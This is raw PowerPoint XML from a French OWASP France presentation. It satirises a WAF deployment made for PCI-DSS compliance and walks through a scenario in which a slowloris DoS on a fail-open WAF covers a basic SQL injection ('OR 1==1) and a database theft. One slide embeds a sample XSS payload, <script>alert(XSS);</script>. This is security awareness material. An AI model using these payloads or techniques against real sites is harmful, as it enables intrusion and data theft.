              <a:t>="http://www.w3.org/1999/xhtml" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xml:lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http-equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" content="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/html; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=UTF-8" /&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="ROBOTS" content="INDEX, FOLLOW" /&gt;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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Professor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XSS);&lt;/script&gt;,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>play</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>game</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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vécu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" strike="dblStrike" dirty="0" smtClean="0"/>
              <a:t>de</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" strike="dblStrike" dirty="0" smtClean="0"/>
              <a:t>l’(in)utilité recyclage déploiement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’un WAF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Société de type VPC sur un marché de niche en B2B.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1ere étape : le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options (via PCI-DSS 6.6, car il est bien connu que toute société qui vend sur internet se doit d’être conforme….) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="903288" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Déployer un WAF + Scan automatisés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="903288" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Mettre en place un code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> sécurité + SDLC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="903288" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-457200"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Solution choisie : déployer un WAF(redondé) + Scans en mode ASP récurrent (1 par mois au minimum) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="903288" lvl="1" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>	=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Magic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> quadrant + idée des conseils en régie + promo de Noël…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-457200"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-457200"/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: la vie du produit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Résultats des scans réguliers : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Tout est vert (forcément il y a un WAF qui voit arriver avec ses gros sabots le robot….)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Configuration du WAF : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Configuration faite par l’ingénieur en charge des Firewalls (normal, c’est un Web Application FIREWALL !)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Remontée des logs dans un fichier (non analysés, car trop d’alertes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Règles parfois permissibles car des outils (type CMS plus ou moins propriétaires génèrent des requêtes bloquées)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L’attaque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marL="554038" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Un lutin malveillant lance une DOS (type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>slowloris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) à destination du WAF en mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fail-open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pendant ce temps, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le lutin malveillant découvre une injection SQL basique (très très basique =&gt; type ‘OR 1==1).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>les bases sont téléchargées par le lutin malveillant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le lutin revend tout ou partie de la base au meilleur offreur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="554038" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le lutin peut continuer à boire ses Guinness.   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détection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fr-FR" dirty="0" smtClean="0"/>
              <a:t>Il n’a été vue que la DOS !!!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Font typeface="Symbol" pitchFamily="-107" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dans les bases, des adresses e-mails spéciales permettent de découvrir une compromission post attaque.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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L’investigation dans les logs HTTP a permis de découvrir l’injection SQL.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bénéfice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+100% de bénéfice(financier) pour le vendeur du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" strike="dblStrike" dirty="0" smtClean="0"/>
              <a:t>PC de la webcam de la machine a café</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+100% de bénéfice(financier) pour le vendeur du scanner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" strike="dblStrike" dirty="0" smtClean="0"/>
              <a:t>tout va bien quand je remets le rapport au DSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASP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		 -424,2%(au minimum) pour l’entreprise :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perte d’image de marque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Perte de l’agrément PCI-DSS (amendes ?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> manuels en urgence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Formation des développeurs en urgence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revue de code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en urgence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" name="Flèche courbée vers la droite 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3657600"/>
            <a:ext cx="838200" cy="685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-112" charset="0"/>
              <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="-112" charset="-128"/>
              <a:sym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  <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="45097"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="132040"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en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</a:rPr>
              <a:t>France</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31751" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="139700" y="990600"/>
            <a:ext cx="8966200" cy="3048000"/>
          </a:xfrm>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="B7B8E8"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="38100" tIns="38100" rIns="78720" bIns="38100"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Webdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>Conseil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>d’Administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> (Association </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>loi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 1901) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Président</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>évangéliste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> et relations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>publiques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sébastien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Gioria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Consultant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>indépendant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>systèmes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>d’informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Président</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> du CLUSIR Poitou-Charentes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v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CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vice-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Président</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>responsable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>projet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Traduction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ludovic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Petit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. Expert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> chez SFR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secrétaire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
